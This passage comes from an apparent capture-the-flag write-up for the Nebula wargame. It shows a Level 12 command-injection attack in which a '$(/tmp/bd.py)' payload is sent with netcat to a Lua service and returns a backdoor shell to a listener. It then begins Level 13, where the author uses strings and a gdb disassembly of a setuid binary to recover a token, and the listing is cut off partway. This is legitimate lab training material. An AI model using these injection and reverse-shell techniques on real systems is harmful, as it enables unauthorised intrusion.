<p>Then I saved it to <code>/tmp/bd.py</code> and launched the attack:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># first start listening for incoming backdoor connections</span>
nc -l localhost <span class="m">8888</span>
<span class="c1"># then attack in a different shell terminal</span>
<span class="nb">cd</span> /home/flag12
<span class="nb">echo</span> -e <span class="s1">'$(/tmp/bd.py)\n'</span> <span class="p">|</span> nc localhost <span class="m">50001</span>
</code></pre></div>
<p>The overall payload that is executed on the Lua script becomes <code>echo $(/tmp/bd.py) | sha1sum</code>
which will substitute and execute the string between <code>$(..)</code> and thus execute the backdoor:</p>
<div class="highlight"><pre><span></span><code>level12@nebula:~$ netcat -l localhost <span class="m">8888</span>
sh: no job control <span class="k">in</span> this shell
sh-4.2$ getflag
getflag
You have successfully executed getflag on a target account
sh-4.2$
</code></pre></div>
<h2>Level 13 - Using gdb to trace a program</h2>
<p>In this level the code checks whether we are id 1000. If so, it proceeds to give us a
access token for the <code>flag13</code> account. But the token must be somewhere in the binary, otherwise
it couldn't be printed out (assuming it isn't retrieved from somewhere else).</p>
<p>A quick check with <code>strings flag13</code> shows us:</p>
<div class="highlight"><pre><span></span><code>level13@nebula:/home/flag13$ strings flag13
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
exit
puts
__stack_chk_fail
printf
getuid
__libc_start_main
GLIBC_2.4
GLIBC_2.0
PTRhp
UWVS
[^_]
Security failure detected. UID %d started us, we expect %d
The system administrators will be notified of this violation
8mjomjh8wml;bwnh8jwbbnnwi;>;88?o;9ob
your token is %s
;*2$"(
</code></pre></div>
<p>The string <code>8mjomjh8wml;bwnh8jwbbnnwi;>;88?o;9ob</code> looks like a token. But it isn't the password for the <code>flag13</code> account.</p>
<p>So let's play with the binary with gdb and disassemble it:</p>
<div class="highlight"><pre><span></span><code><span class="p">(</span><span class="n">gdb</span><span class="p">)</span><span class="w"> </span><span class="k">set</span><span class="w"> </span><span class="n">disassembly</span><span class="o">-</span><span class="n">flavor</span><span class="w"> </span><span class="n">intel</span><span class="w"></span>
<span class="p">(</span><span class="n">gdb</span><span class="p">)</span><span class="w"> </span><span class="n">disassemble</span><span class="w"> </span><span class="n">main</span><span class="w"></span>
<span class="k">Dump</span><span class="w"> </span><span class="k">of</span><span class="w"> </span><span class="n">assembler</span><span class="w"> </span><span class="n">code</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="k">function</span><span class="w"> </span><span class="nl">main</span><span class="p">:</span><span class="w"></span>
<span class="mh">0x080484c4</span><span class="w"> </span><span class="o"><+</span><span class="mi">0</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">push</span><span class="w"> </span><span class="n">ebp</span><span class="w"></span>
<span class="mh">0x080484c5</span><span class="w"> </span><span class="o"><+</span><span class="mi">1</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">ebp</span><span class="p">,</span><span class="n">esp</span><span class="w"></span>
<span class="mh">0x080484c7</span><span class="w"> </span><span class="o"><+</span><span class="mi">3</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">push</span><span class="w"> </span><span class="n">edi</span><span class="w"></span>
<span class="mh">0x080484c8</span><span class="w"> </span><span class="o"><+</span><span class="mi">4</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">push</span><span class="w"> </span><span class="n">ebx</span><span class="w"></span>
<span class="mh">0x080484c9</span><span class="w"> </span><span class="o"><+</span><span class="mi">5</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="ow">and</span><span class="w"> </span><span class="n">esp</span><span class="p">,</span><span class="mh">0xfffffff0</span><span class="w"></span>
<span class="mh">0x080484cc</span><span class="w"> </span><span class="o"><+</span><span class="mi">8</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">sub</span><span class="w"> </span><span class="n">esp</span><span class="p">,</span><span class="mh">0x130</span><span class="w"></span>
<span class="mh">0x080484d2</span><span class="w"> </span><span class="o"><+</span><span class="mi">14</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">ebp+0xc</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x080484d5</span><span class="w"> </span><span class="o"><+</span><span class="mi">17</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp+0x1c</span><span class="o">]</span><span class="p">,</span><span class="n">eax</span><span class="w"></span>
<span class="mh">0x080484d9</span><span class="w"> </span><span class="o"><+</span><span class="mi">21</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">ebp+0x10</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x080484dc</span><span class="w"> </span><span class="o"><+</span><span class="mi">24</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp+0x18</span><span class="o">]</span><span class="p">,</span><span class="n">eax</span><span class="w"></span>
<span class="mh">0x080484e0</span><span class="w"> </span><span class="o"><+</span><span class="mi">28</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="nl">gs</span><span class="p">:</span><span class="mh">0x14</span><span class="w"></span>
<span class="mh">0x080484e6</span><span class="w"> </span><span class="o"><+</span><span class="mi">34</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp+0x12c</span><span class="o">]</span><span class="p">,</span><span class="n">eax</span><span class="w"></span>
<span class="mh">0x080484ed</span><span class="w"> </span><span class="o"><+</span><span class="mi">41</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">xor</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="n">eax</span><span class="w"></span>
<span class="mh">0x080484ef</span><span class="w"> </span><span class="o"><+</span><span class="mi">43</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="k">call</span><span class="w"> </span><span class="mh">0x80483c0</span><span class="w"> </span><span class="o"><</span><span class="n">getuid</span><span class="nv">@plt</span><span class="o">></span><span class="w"></span>
<span class="mh">0x080484f4</span><span class="w"> </span><span class="o"><+</span><span class="mi">48</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">cmp</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="mh">0x3e8</span><span class="w"></span>
<span class="mh">0x080484f9</span><span class="w"> </span><span class="o"><+</span><span class="mi">53</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">je</span><span class="w"> </span><span class="mh">0x8048531</span><span class="w"> </span><span class="o"><</span><span class="n">main</span><span class="o">+</span><span class="mi">109</span><span class="o">></span><span class="w"></span>
<span class="mh">0x080484fb</span><span class="w"> </span><span class="o"><+</span><span class="mi">55</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="k">call</span><span class="w"> </span><span class="mh">0x80483c0</span><span class="w"> </span><span class="o"><</span><span class="n">getuid</span><span class="nv">@plt</span><span class="o">></span><span class="w"></span>
<span class="mh">0x08048500</span><span class="w"> </span><span class="o"><+</span><span class="mi">60</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">edx</span><span class="p">,</span><span class="mh">0x80486d0</span><span class="w"></span>
<span class="mh">0x08048505</span><span class="w"> </span><span class="o"><+</span><span class="mi">65</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp+0x8</span><span class="o">]</span><span class="p">,</span><span class="mh">0x3e8</span><span class="w"></span>
<span class="mh">0x0804850d</span><span class="w"> </span><span class="o"><+</span><span class="mi">73</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp+0x4</span><span class="o">]</span><span class="p">,</span><span class="n">eax</span><span class="w"></span>
<span class="mh">0x08048511</span><span class="w"> </span><span class="o"><+</span><span class="mi">77</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp</span><span class="o">]</span><span class="p">,</span><span class="n">edx</span><span class="w"></span>
<span class="mh">0x08048514</span><span class="w"> </span><span class="o"><+</span><span class="mi">80</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="k">call</span><span class="w"> </span><span class="mh">0x80483a0</span><span class="w"> </span><span class="o"><</span><span class="n">printf</span><span class="nv">@plt</span><span class="o">></span><span class="w"></span>
<span class="mh">0x08048519</span><span class="w"> </span><span class="o"><+</span><span class="mi">85</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp</span><span class="o">]</span><span class="p">,</span><span class="mh">0x804870c</span><span class="w"></span>
<span class="mh">0x08048520</span><span class="w"> </span><span class="o"><+</span><span class="mi">92</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="k">call</span><span class="w"> </span><span class="mh">0x80483d0</span><span class="w"> </span><span class="o"><</span><span class="n">puts</span><span class="nv">@plt</span><span class="o">></span><span class="w"></span>
<span class="mh">0x08048525</span><span class="w"> </span><span class="o"><+</span><span class="mi">97</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp</span><span class="o">]</span><span class="p">,</span><span class="mh">0x1</span><span class="w"></span>
<span class="mh">0x0804852c</span><span class="w"> </span><span class="o"><+</span><span class="mi">104</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="k">call</span><span class="w"> </span><span class="mh">0x80483f0</span><span class="w"> </span><span class="o"><</span><span class="k">exit</span><span class="nv">@plt</span><span class="o">></span><span class="w"></span>
<span class="mh">0x08048531</span><span class="w"> </span><span class="o"><+</span><span class="mi">109</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">lea</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="o">[</span><span class="n">esp+0x2c</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x08048535</span><span class="w"> </span><span class="o"><+</span><span class="mi">113</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">ebx</span><span class="p">,</span><span class="n">eax</span><span class="w"></span>
<span class="mh">0x08048537</span><span class="w"> </span><span class="o"><+</span><span class="mi">115</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="mh">0x0</span><span class="w"></span>
<span class="mh">0x0804853c</span><span class="w"> </span><span class="o"><+</span><span class="mi">120</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">edx</span><span class="p">,</span><span class="mh">0x40</span><span class="w"></span>
<span class="mh">0x08048541</span><span class="w"> </span><span class="o"><+</span><span class="mi">125</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">edi</span><span class="p">,</span><span class="n">ebx</span><span class="w"></span>
<span class="mh">0x08048543</span><span class="w"> </span><span class="o"><+</span><span class="mi">127</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">ecx</span><span class="p">,</span><span class="n">edx</span><span class="w"></span>
<span class="mh">0x08048545</span><span class="w"> </span><span class="o"><+</span><span class="mi">129</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">rep</span><span class="w"> </span><span class="n">stos</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="nl">es</span><span class="p">:</span><span class="o">[</span><span class="n">edi</span><span class="o">]</span><span class="p">,</span><span class="n">eax</span><span class="w"></span>
<span class="mh">0x08048547</span><span class="w"> </span><span class="o"><+</span><span class="mi">131</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">edx</span><span class="p">,</span><span class="mh">0x804874c</span><span class="w"></span>
<span class="mh">0x0804854c</span><span class="w"> </span><span class="o"><+</span><span class="mi">136</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">lea</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="o">[</span><span class="n">esp+0x2c</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x08048550</span><span class="w"> </span><span class="o"><+</span><span class="mi">140</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">ecx</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">edx</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x08048552</span><span class="w"> </span><span class="o"><+</span><span class="mi">142</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">eax</span><span class="o">]</span><span class="p">,</span><span class="n">ecx</span><span class="w"></span>
<span class="mh">0x08048554</span><span class="w"> </span><span class="o"><+</span><span class="mi">144</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">ecx</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">edx+0x4</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x08048557</span><span class="w"> </span><span class="o"><+</span><span class="mi">147</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">eax+0x4</span><span class="o">]</span><span class="p">,</span><span class="n">ecx</span><span class="w"></span>
<span class="mh">0x0804855a</span><span class="w"> </span><span class="o"><+</span><span class="mi">150</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">ecx</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">edx+0x8</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x0804855d</span><span class="w"> </span><span class="o"><+</span><span class="mi">153</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">eax+0x8</span><span class="o">]</span><span class="p">,</span><span class="n">ecx</span><span class="w"></span>
<span class="mh">0x08048560</span><span class="w"> </span><span class="o"><+</span><span class="mi">156</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">ecx</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">edx+0xc</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x08048563</span><span class="w"> </span><span class="o"><+</span><span class="mi">159</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">eax+0xc</span><span class="o">]</span><span class="p">,</span><span class="n">ecx</span><span class="w"></span>
<span class="mh">0x08048566</span><span class="w"> </span><span class="o"><+</span><span class="mi">162</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">ecx</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">edx+0x10</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x08048569</span><span class="w"> </span><span class="o"><+</span><span class="mi">165</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">eax+0x10</span><span class="o">]</span><span class="p">,</span><span class="n">ecx</span><span class="w"></span>
<span class="mh">0x0804856c</span><span class="w"> </span><span class="o"><+</span><span class="mi">168</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">ecx</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">edx+0x14</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x0804856f</span><span class="w"> </span><span class="o"><+</span><span class="mi">171</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">eax+0x14</span><span class="o">]</span><span class="p">,</span><span class="n">ecx</span><span class="w"></span>
<span class="mh">0x08048572</span><span class="w"> </span><span class="o"><+</span><span class="mi">174</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">ecx</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">edx+0x18</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x08048575</span><span class="w"> </span><span class="o"><+</span><span class="mi">177</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">eax+0x18</span><span class="o">]</span><span class="p">,</span><span class="n">ecx</span><span class="w"></span>
<span class="mh">0x08048578</span><span class="w"> </span><span class="o"><+</span><span class="mi">180</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">ecx</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">edx+0x1c</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x0804857b</span><span class="w"> </span><span class="o"><+</span><span class="mi">183</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">eax+0x1c</span><span class="o">]</span><span class="p">,</span><span class="n">ecx</span><span class="w"></span>
<span class="mh">0x0804857e</span><span class="w"> </span><span class="o"><+</span><span class="mi">186</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">ecx</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">edx+0x20</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x08048581</span><span class="w"> </span><span class="o"><+</span><span class="mi">189</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">eax+0x20</span><span class="o">]</span><span class="p">,</span><span class="n">ecx</span><span class="w"></span>
<span class="mh">0x08048584</span><span class="w"> </span><span class="o"><+</span><span class="mi">192</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">movzx</span><span class="w"> </span><span class="n">edx</span><span class="p">,</span><span class="n">BYTE</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">edx+0x24</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x08048588</span><span class="w"> </span><span class="o"><+</span><span class="mi">196</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">BYTE</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">eax+0x24</span><span class="o">]</span><span class="p">,</span><span class="n">dl</span><span class="w"></span>
<span class="mh">0x0804858b</span><span class="w"> </span><span class="o"><+</span><span class="mi">199</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp+0x28</span><span class="o">]</span><span class="p">,</span><span class="mh">0x0</span><span class="w"></span>
<span class="mh">0x08048593</span><span class="w"> </span><span class="o"><+</span><span class="mi">207</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">jmp</span><span class="w"> </span><span class="mh">0x80485b4</span><span class="w"> </span><span class="o"><</span><span class="n">main</span><span class="o">+</span><span class="mi">240</span><span class="o">></span><span class="w"></span>
<span class="mh">0x08048595</span><span class="w"> </span><span class="o"><+</span><span class="mi">209</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">lea</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="o">[</span><span class="n">esp+0x2c</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x08048599</span><span class="w"> </span><span class="o"><+</span><span class="mi">213</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="k">add</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp+0x28</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x0804859d</span><span class="w"> </span><span class="o"><+</span><span class="mi">217</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">movzx</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="n">BYTE</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">eax</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x080485a0</span><span class="w"> </span><span class="o"><+</span><span class="mi">220</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">edx</span><span class="p">,</span><span class="n">eax</span><span class="w"></span>
<span class="mh">0x080485a2</span><span class="w"> </span><span class="o"><+</span><span class="mi">222</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">xor</span><span class="w"> </span><span class="n">edx</span><span class="p">,</span><span class="mh">0x5a</span><span class="w"></span>
<span class="mh">0x080485a5</span><span class="w"> </span><span class="o"><+</span><span class="mi">225</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">lea</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="o">[</span><span class="n">esp+0x2c</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x080485a9</span><span class="w"> </span><span class="o"><+</span><span class="mi">229</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="k">add</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp+0x28</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x080485ad</span><span class="w"> </span><span class="o"><+</span><span class="mi">233</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">BYTE</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">eax</span><span class="o">]</span><span class="p">,</span><span class="n">dl</span><span class="w"></span>
<span class="mh">0x080485af</span><span class="w"> </span><span class="o"><+</span><span class="mi">235</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="k">add</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp+0x28</span><span class="o">]</span><span class="p">,</span><span class="mh">0x1</span><span class="w"></span>
<span class="mh">0x080485b4</span><span class="w"> </span><span class="o"><+</span><span class="mi">240</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">lea</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="o">[</span><span class="n">esp+0x2c</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x080485b8</span><span class="w"> </span><span class="o"><+</span><span class="mi">244</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="k">add</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp+0x28</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x080485bc</span><span class="w"> </span><span class="o"><+</span><span class="mi">248</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">movzx</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="n">BYTE</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">eax</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x080485bf</span><span class="w"> </span><span class="o"><+</span><span class="mi">251</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">test</span><span class="w"> </span><span class="n">al</span><span class="p">,</span><span class="n">al</span><span class="w"></span>
<span class="mh">0x080485c1</span><span class="w"> </span><span class="o"><+</span><span class="mi">253</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">jne</span><span class="w"> </span><span class="mh">0x8048595</span><span class="w"> </span><span class="o"><</span><span class="n">main</span><span class="o">+</span><span class="mi">209</span><span class="o">></span><span class="w"></span>
<span class="mh">0x080485c3</span><span class="w"> </span><span class="o"><+</span><span class="mi">255</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="mh">0x8048771</span><span class="w"></span>
<span class="mh">0x080485c8</span><span class="w"> </span><span class="o"><+</span><span class="mi">260</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">lea</span><span class="w"> </span><span class="n">edx</span><span class="p">,</span><span class="o">[</span><span class="n">esp+0x2c</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x080485cc</span><span class="w"> </span><span class="o"><+</span><span class="mi">264</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp+0x4</span><span class="o">]</span><span class="p">,</span><span class="n">edx</span><span class="w"></span>
<span class="mh">0x080485d0</span><span class="w"> </span><span class="o"><+</span><span class="mi">268</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp</span><span class="o">]</span><span class="p">,</span><span class="n">eax</span><span class="w"></span>
<span class="mh">0x080485d3</span><span class="w"> </span><span class="o"><+</span><span class="mi">271</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="k">call</span><span class="w"> </span><span class="mh">0x80483a0</span><span class="w"> </span><span class="o"><</span><span class="n">printf</span><span class="nv">@plt</span><span class="o">></span><span class="w"></span>
<span class="mh">0x080485d8</span><span class="w"> </span><span class="o"><+</span><span class="mi">276</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">edx</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp+0x12c</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x080485df</span><span class="w"> </span><span class="o"><+</span><span class="mi">283</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">xor</span><span class="w"> </span><span class="n">edx</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="nl">gs</span><span class="p">:</span><span class="mh">0x14</span><span class="w"></span>
<span class="mh">0x080485e6</span><span class="w"> </span><span class="o"><+</span><span class="mi">290</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">je</span><span class="w"> </span><span class="mh">0x80485ed</span><span class="w"> </span><span class="o"><</span><span class="n">main</span><span class="o">+</span><span class="mi">297</span><span class="o">></span><span class="w"></span>
<span class="mh">0x080485e8</span><span class="w"> </span><span class="o"><+</span><span class="mi">292</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="k">call</span><span class="w"> </span><span class="mh">0x80483b0</span><span class="w"> </span><span class="o"><</span><span class="n">__stack_chk_fail</span><span class="nv">@plt</span><span class="o">></span><span class="w"></span>
<span class="mh">0x080485ed</span><span class="w"> </span><span class="o"><+</span><span class="mi">297</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">lea</span><span class="w"> </span><span class="n">esp</span><span class="p">,</span><span class="o">[</span><span class="n">ebp-0x8</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x080485f0</span><span class="w"> </span><span class="o"><+</span><span class="mi">300</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">pop</span><span class="w"> </span><span class="n">ebx</span><span class="w"></span>
